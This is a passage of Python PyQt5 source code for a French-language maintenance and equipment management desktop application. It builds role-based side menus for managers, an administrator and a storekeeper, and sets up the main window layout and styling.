Equipement_UI(self,self.dialogEquipement)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.stackedWidget.addWidget(self.dialogEquipement)\n self.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def displayEquipementConsulter(self):\n self.dialogEquipementConsulter = QtWidgets.QDialog()\n self.uiEquipementConsulter = EquipementConsulter_UI(self)\n self.uiEquipementConsulter.setupUi(self.dialogEquipementConsulter)\n self.stackedWidget.addWidget(self.dialogEquipementConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogEquipementConsulter)\n def displayBonApprovisionment(self):\n self.dialogBonApprovisionment = QtWidgets.QDialog()\n self.uiBonApprovisionment = BonApprovisionment_UI(self)\n self.uiBonApprovisionment.setupUi(self.dialogBonApprovisionment)\n self.stackedWidget.addWidget(self.dialogBonApprovisionment)\n self.stackedWidget.setCurrentWidget(self.dialogBonApprovisionment)\n def displayBonApprovisionmentConsulter(self):\n self.dialogBonApprovisionmentConsulter = QtWidgets.QDialog()\n self.uiBonApprovisionmentConsulter = BonApprovisionmentConsulter_UI()\n self.uiBonApprovisionmentConsulter.setupUi(self.dialogBonApprovisionmentConsulter)\n self.stackedWidget.addWidget(self.dialogBonApprovisionmentConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogBonApprovisionmentConsulter)\n def displayDemandeIntervention(self):\n self.dialogDemandeIntervention = QtWidgets.QDialog()\n self.uiDemandeIntervention = DemandeIntervention_UI(self,self.dialogDemandeIntervention)\n self.uiDemandeIntervention.setupUi(self.dialogDemandeIntervention)\n self.stackedWidget.addWidget(self.dialogDemandeIntervention)\n self.stackedWidget.setCurrentWidget(self.dialogDemandeIntervention)\n def displayDemandeInterventionConsulter(self):\n self.dialogDemandeInterventionConsulter = QtWidgets.QDialog()\n self.uiDemandeInterventionConsulter = DemandeInterventionConsulter_UI(self,self.dialogDemandeInterventionConsulter)\n self.uiDemandeInterventionConsulter.setupUi(self.dialogDemandeInterventionConsulter)\n self.stackedWidget.addWidget(self.dialogDemandeInterventionConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogDemandeInterventionConsulter)\n\n def signOut(self):\n self.dialogSignIn.show()\n self.mainwindow.hide()\n def initialiseRM(self):\n ##############################################################################################################################################################################\n # Responsable Maintenance #\n ##############################################################################################################################################################################\n\n if self.role == 'ResponsableMaintenance':\n\n status,record = ResponsableMaintenanceServices.getResponsableMaintenance(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n \n self.affdash()\n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n\n \n\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"width: 150px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"height: 22px;\\n\"\n \"font-weight : bold;\\n\"\n \"background-position: center left;\")\n\n self.DashboardBox.clicked.connect(self.displayDashboard)\n self.formLayout.addWidget(self.DashboardBox)\n\n self.DashboardBox.clicked.connect(self.affdash)\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n lay = QtWidgets.QVBoxLayout()\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n\n \n \n\n \n \n \n \n MaintenanceBonTravailPreventifCurative = QtWidgets.QPushButton(\"Bon de Travail\")\n MaintenanceBonTravailPreventifCurative.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n \n MaintenanceBonTravailPreventifCurative.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravailPreventifCurative.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceBonTravailPreventifCurative)\n \n MaintenanceBonTravailPreventifCurative.clicked.connect(self.displayBonTravail)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n \n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,2,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n NotificationsConsulterDemandesInterventions = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n NotificationsConsulterDemandesInterventions.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationsConsulterDemandesInterventions.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationsConsulterDemandesInterventions.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n\n NotificationsConsulterDemandesInterventions.clicked.connect(self.displayDemandeInterventionConsulter)\n \n \n lay.addWidget(NotificationsConsulterDemandesInterventions)\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n EquipementsConsulter = QtWidgets.QPushButton(\"Liste Équipements\")\n EquipementsConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n\n EquipementsConsulter.clicked.connect(self.displayEquipement)\n lay.addWidget(EquipementsConsulter)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnement\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\n EquipementsDemandeApprovisionnement.clicked.connect(self.displayBonApprovisionment)\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n self.NotificationObject.start_Thread(self.matricule)\n ##############################################################################################################################################################################\n def initialiseRP(self):\n ##############################################################################################################################################################################\n # Responsable Production #\n ##############################################################################################################################################################################\n\n if self.role == 'ResponsableProduction':\n\n status,record = ResponsableProductionServices.getResponsableProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"width: 150px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"height: 22px;\\n\"\n \"font-weight : bold;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n \n \n MaintenanceBonTravailPreventif = QtWidgets.QPushButton(\"Bons de Travails\")\n MaintenanceBonTravailPreventif.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceBonTravailPreventif.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravailPreventif.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceBonTravailPreventif)\n\n MaintenanceBonTravailPreventif.clicked.connect(self.displayBonTravailConsulter)\n\n MaintenanceDemandesInterventions = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n MaintenanceDemandesInterventions.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceDemandesInterventions.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceDemandesInterventions.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceDemandesInterventions)\n\n MaintenanceDemandesInterventions.clicked.connect(self.displayDemandeInterventionConsulter)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n \n\n\n self.UsersBox = CollapsibleBox('Utilisateurs',self.left_menu_top_buttons,2,\":/icons/icons/group.png\")\n self.UsersBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n UtilisateursConsulter = QtWidgets.QPushButton(\"Responsables Chaines-Productions\")\n UtilisateursConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n UtilisateursConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n UtilisateursConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(UtilisateursConsulter)\n\n\n self.UsersBox.setContentLayout(lay)\n self.formLayout.addWidget(self.UsersBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n EquipementsConsulter = QtWidgets.QPushButton(\"Liste Équipements\")\n EquipementsConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(EquipementsConsulter)\n\n EquipementsConsulter.clicked.connect(self.displayEquipementConsulter)\n\n EquipementsBonApprovisionnement = QtWidgets.QPushButton(\"Demandes d'Approvisionnements\")\n EquipementsBonApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsBonApprovisionnement.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n EquipementsBonApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n lay.addWidget(EquipementsBonApprovisionnement)\n\n EquipementsBonApprovisionnement.clicked.connect(self.displayBonApprovisionmentConsulter)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n ##############################################################################################################################################################################\n def initialiseRCP(self):\n ##############################################################################################################################################################################\n # Responsable Chaine Production #\n ##############################################################################################################################################################################\n\n if self.role==\"ResponsableChaineProduction\":\n\n status,record = ResponsableChaineProductionServices.getResponsableChaineProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n\n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"height: 22px;\\n\"\n \"font-weight: bold;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,1,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n MaintenanceDemandeIntervention = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n MaintenanceDemandeIntervention.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceDemandeIntervention.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceDemandeIntervention.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(MaintenanceDemandeIntervention)\n\n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,1,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n NotificationValidation = QtWidgets.QPushButton(\"Validation de Réception\")\n NotificationValidation.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationValidation.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationValidation.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(NotificationValidation)\n\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,1,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ConsulterEquipement = QtWidgets.QPushButton(\"Liste Equipements\")\n ConsulterEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ConsulterEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ConsulterEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ConsulterEquipement)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n ConsulterEquipement.clicked.connect(self.displayEquipement)\n MaintenanceDemandeIntervention.clicked.connect(self.displayDemandeIntervention)\n \n\n\n\n\n\n\n\n\n ################################################################################################################################################################\n def initialiseAdmin(self):\n ###############################################################################################################################################################\n # Administrateur #\n ###############################################################################################################################################################\n\n\n if self.role==\"Administrateur\":\n\n '''status,record = ResponsableChaineProductionServices.getResponsableChaineProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]'''\n self.nom=\"\"\n self.prenom=\"\"\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"font-weight: bold;\\n\"\n \"height: 22px;\\n\"\n \"background-position: center left;\")\n\n self.DashboardBox.clicked.connect(self.displayDashboard)\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n \n MaintenanceBonTravail = QtWidgets.QPushButton(\"Bons de Travails\")\n MaintenanceBonTravail.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceBonTravail.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravail.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(MaintenanceBonTravail)\n\n MaintenanceBonTravail.clicked.connect(self.displayBonTravailConsulter)\n\n DemandeInterventioon = QtWidgets.QPushButton(\"Demande Interventions\")\n DemandeInterventioon.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n DemandeInterventioon.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n DemandeInterventioon.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(DemandeInterventioon)\n\n DemandeInterventioon.clicked.connect(self.displayDemandeInterventionConsulter)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n\n self.UtilisateurBox = CollapsibleBox('Utilisateurs',self.left_menu_top_buttons,2,\":/icons/icons/group.png\")\n self.UtilisateurBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n CRUDUtilisateur = QtWidgets.QPushButton(\"Liste D'utilisateurs\")\n CRUDUtilisateur.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n CRUDUtilisateur.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n CRUDUtilisateur.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(CRUDUtilisateur)\n\n self.UtilisateurBox.setContentLayout(lay)\n self.formLayout.addWidget(self.UtilisateurBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ListeEquipement = QtWidgets.QPushButton(\"Liste d'Equipements\")\n ListeEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ListeEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ListeEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ListeEquipement)\n\n ListeEquipement.clicked.connect(self.displayEquipementConsulter)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnements\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n EquipementsDemandeApprovisionnement.clicked.connect(self.displayBonApprovisionmentConsulter)\n\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n CRUDUtilisateur.clicked.connect(self.handleadd)\n def initialiseMagasinier(self):\n ################################################################################################################\n #Magasiner\n #################################################################################################################\n if self.role==\"Magasinier\":\n\n status,record = MagasinierServices.getMagasinier(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"font-weight: bold;\\n\"\n \"height: 22px;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,1,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n NotificationValidation = QtWidgets.QPushButton(\"Validation de Réception\")\n NotificationValidation.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationValidation.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationValidation.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(NotificationValidation)\n\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ListeEquipement = QtWidgets.QPushButton(\"Liste Piéces de Rechanges\")\n ListeEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ListeEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ListeEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ListeEquipement)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnements\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n\n\n ################################################################################################################\n def initialiseMainWindow(self):\n self.initialiseRM()\n self.initialiseRP()\n self.initialiseRCP()\n self.initialiseAdmin()\n self.initialiseMagasinier()\n self.LabesSpace.setText(\"Space \"+self.role+\"( \"+self.matricule +\" \"+self.nom+\" \"+self.prenom+\" )\")\n \n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1225, 717)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setStyleSheet(\"\")\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setSpacing(0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.main_header = QtWidgets.QFrame(self.centralwidget)\n self.main_header.setMaximumSize(QtCore.QSize(16777215, 50))\n self.main_header.setStyleSheet(\"QFrame{\\n\"\n\" \\n\"\n\" background-color: #22333B;\\n\"\n\"}\")\n self.main_header.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.main_header.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_header.setObjectName(\"main_header\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.main_header)\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(0)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.tittle_bar_container = QtWidgets.QFrame(self.main_header)\n self.tittle_bar_container.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.tittle_bar_container.setFrameShadow(QtWidgets.QFrame.Raised)\n self.tittle_bar_container.setObjectName(\"tittle_bar_container\")\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.tittle_bar_container)\n self.horizontalLayout_5.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_5.setSpacing(0)\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\n self.left_menu_toggle = QtWidgets.QFrame(self.tittle_bar_container)\n self.left_menu_toggle.setMinimumSize(QtCore.QSize(50, 0))\n self.left_menu_toggle.setMaximumSize(QtCore.QSize(50, 16777215))\n self.left_menu_toggle.setStyleSheet(\"QFrame{\\n\"\n\"\\n\"\n\"}\\n\"\n\"QPushButton{\\n\"\n\" padding: 5px 10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 5px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.left_menu_toggle.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.left_menu_toggle.setFrameShadow(QtWidgets.QFrame.Raised)\n self.left_menu_toggle.setObjectName(\"left_menu_toggle\")\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.left_menu_toggle)\n self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_4.setSpacing(0)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.left_menu_toggle_btn = QtWidgets.QPushButton(self.left_menu_toggle)\n self.left_menu_toggle_btn.setMinimumSize(QtCore.QSize(0, 40))\n self.left_menu_toggle_btn.setMaximumSize(QtCore.QSize(50, 16777215))\n self.left_menu_toggle_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.left_menu_toggle_btn.setStyleSheet(\"background-image: url(:/icons/icons/menu.png);\\n\"\n\"background-repeat: none;\\n\"\n\"padding-left: 50px;\\n\"\n\"background-position: center ;\")\n self.left_menu_toggle_btn.setText(\"\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\":/icons/icons/cil-menu.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.left_menu_toggle_btn.setIcon(icon)\n self.left_menu_toggle_btn.setIconSize(QtCore.QSize(24, 24))\n self.left_menu_toggle_btn.setObjectName(\"left_menu_toggle_btn\")\n self.horizontalLayout_4.addWidget(self.left_menu_toggle_btn)\n self.horizontalLayout_5.addWidget(self.left_menu_toggle)\n self.tittle_bar = QtWidgets.QFrame(self.tittle_bar_container)\n self.tittle_bar.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.tittle_bar.setStyleSheet(\"\")\n self.tittle_bar.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.tittle_bar.setFrameShadow(QtWidgets.QFrame.Raised)\n self.tittle_bar.setObjectName(\"tittle_bar\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.tittle_bar)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.LabesSpace = QtWidgets.QLabel(self.tittle_bar)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabesSpace.setFont(font)\n self.LabesSpace.setStyleSheet(\"color:white;\")\n self.LabesSpace.setText(\"\")\n self.LabesSpace.setAlignment(QtCore.Qt.AlignCenter)\n self.LabesSpace.setObjectName(\"LabesSpace\")\n self.horizontalLayout_3.addWidget(self.LabesSpace)\n self.horizontalLayout_5.addWidget(self.tittle_bar)\n self.horizontalLayout_2.addWidget(self.tittle_bar_container)\n self.verticalLayout.addWidget(self.main_header)\n self.main_body = QtWidgets.QFrame(self.centralwidget)\n self.main_body.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.main_body.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_body.setObjectName(\"main_body\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.main_body)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setSpacing(0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.left_side_menu = QtWidgets.QFrame(self.main_body)\n self.left_side_menu.setMaximumSize(QtCore.QSize(75, 16777215))\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.left_side_menu.setFont(font)\n self.left_side_menu.setStyleSheet(\"background-color: #22333B;\")\n self.left_side_menu.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.left_side_menu.setFrameShadow(QtWidgets.QFrame.Raised)\n self.left_side_menu.setObjectName(\"left_side_menu\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.left_side_menu)\n self.verticalLayout_3.setContentsMargins(7, 0, 0, 0)\n self.verticalLayout_3.setSpacing(0)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.scrollArea = QtWidgets.QScrollArea(self.left_side_menu)\n self.scrollArea.setStyleSheet(\"\")\n self.scrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.scrollArea.setWidgetResizable(True)\n self.scrollArea.setObjectName(\"scrollArea\")\n self.left_menu_top_buttons = QtWidgets.QWidget()\n self.left_menu_top_buttons.setGeometry(QtCore.QRect(0, 0, 66, 571))\n self.left_menu_top_buttons.setStyleSheet(\"QPushButton{\\n\"\n\" padding: 20px 10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 10px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\" margin : 10px 5px; \\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.left_menu_top_buttons.setObjectName(\"left_menu_top_buttons\")\n self.formLayout = QtWidgets.QFormLayout(self.left_menu_top_buttons)\n self.formLayout.setObjectName(\"formLayout\")\n self.scrollArea.setWidget(self.left_menu_top_buttons)\n self.verticalLayout_3.addWidget(self.scrollArea)\n self.SignOut = QtWidgets.QPushButton(self.left_side_menu)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.SignOut.setFont(font)\n self.SignOut.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.SignOut.setStyleSheet(\"\\n\"\n\"\\n\"\n\"QPushButton{\\n\"\n\" padding: 20px 10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 10px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\" margin : 10px 5px; \\n\"\n\" background-image: url(:/icons/icons/sign-out.png);\\n\"\n\" background-repeat: none;\\n\"\n\" padding-left: 50px;\\n\"\n\" background-position: left center ;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.SignOut.setObjectName(\"SignOut\")\n self.verticalLayout_3.addWidget(self.SignOut)\n 